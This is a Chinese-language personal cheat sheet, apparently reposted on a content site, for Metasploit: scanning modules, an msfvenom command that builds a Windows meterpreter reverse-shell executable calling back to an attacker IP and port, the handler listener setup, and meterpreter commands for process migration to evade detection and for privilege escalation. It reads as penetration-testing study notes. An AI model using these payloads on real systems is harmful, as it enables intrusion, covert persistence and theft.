更新中
一.基礎:
shell中直接輸入msfconsole開始運行
- use +模塊路徑 使用模塊
- search+模塊關鍵字 用來搜索模塊
- back 返回主界面
模塊中:
-
info 查看模塊信息
-
show options 查看模塊設置項
-
show targets 顯示可選擇的target(targert更像是給你選項,你去細化攻擊細節(jié),但是明明目標機器是64位系統(tǒng),我選擇target為64攻擊不匹配,但是選擇86卻攻擊成功,為什么呢?這個問題解決了,因為生成木馬的時候會有生成64位還是32位的選項,默認是32位,也就是×86,因為木馬是×86,既然x86的木馬執(zhí)行成功了,選擇target自然也是x86)
-
expolit/run 開始執(zhí)行
高級設置:
set AutoRunScript migrate -f 自動遷移進程
二.信息收集:
主機存活探測:auxiliary/scanner/discovery/arp_sweep ARP 掃描auxiliary/scanner/discovery/udp_sweep UDP 掃描auxiliary/scanner/netbios/nbname NETBIOS 掃描auxiliary/scanner/snmp/snmp_enum SNMP 掃描auxiliary/scanner/smb/smb_version SMB 掃描端口掃描:auxiliary/scanner/portscan/ack TCP ACK 端口掃描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口掃描auxiliary/scanner/portscan/syn SYN 端口掃描auxiliary/scanner/portscan/tcp TCP 端口掃描auxiliary/scanner/portscan/xmas TCP XMas 端口掃描
使用方法:1.用內網的機器開個代理,使kali的流量可以到達內網,然后使用模塊掃描2.使用后門連接,通過session進行掃描3.在同一個內網里面可以直接掃描(一般不會有這種情況吧,除非我?guī)е娔X潛入目標地點)這三點適用于內網滲透的很多場景
三.滲透
3.1反向后門的使用
我的話:
反彈shell是等受害機器來連接我,所以我在這里的設置,不需要去設置受害機器的ip,因為只要受害機器知道來哪里找我就行了
生成反向后門:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe
(
高亮為可設置參數,
lhost是監(jiān)聽機ip地址(也就是攻擊者kali的ip地址)lport是監(jiān)聽端口(也就是攻擊者準備接收反彈回來的shell的那個端口)
)
監(jiān)聽后門:
use exploit/multi/handler
use exploit/multi/handler #通過use選擇監(jiān)聽模塊
set payload windows/meterpreter/reverse_tcp #選擇設置反彈shell的監(jiān)聽(這一步我有幾次忽略了,導致出現錯誤,連接失敗,所以這一步一定不要落下,設置監(jiān)聽的類型)
set lhost 192.168.43.43 #這里的ip和端口應該和后門代碼保持一致
set lport 18888
exploit #開始執(zhí)行
meterpreter
獲取到shell后,會為被控制的機器開啟一個session(會話),msf可以同時監(jiān)聽多個session,并且在不同的session之間隨意切換,黑客在session中執(zhí)行命令等同于在目標主機執(zhí)行命令,也可以使用msf的攻擊模塊通過session對目標主機進行攻擊。在session中執(zhí)行命令的模式也被稱為meterpreter模式
session中:
getuid #獲取當前用戶的權限吧,看演示里面一般是作這個用的
migrate [進程號] #將后門進程遷移到其它進程里面,達到權限維持的效果(更不容易被發(fā)現)
help #可以顯示在meterpreter模式下可以操作的指令列表(一部分)
search [-d dir] [-r recurse] -f pattern #在被控制的機器內搜索文件
shell #得到終端
background #把session放置后臺
ps #列出所有進程,以及進程的信息(在這里可以看到pid,知道pid就可以使用kill來終止進程了)
session外:
session -l #列出當前的所有session以及其信息
sessions -K #關閉所有session連接,這里的k是大寫
sessions -k [指定session的id] #殺死指定id的session
sessions [id號] #根據id號進入不同的session
3.2提權
補丁查詢:文章來源:http://www.zghlxwxcb.cn/news/detail-440323.html
run post/windows/gather/enum_patches 查詢補丁信息use post/multi/recon/local_exploit_suggester 這個模塊可通過session查詢當前可以用來提權的exp,(可能會失靈)文章來源地址http://www.zghlxwxcb.cn/news/detail-440323.html
到了這里,關于msf常用模塊功能整理的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!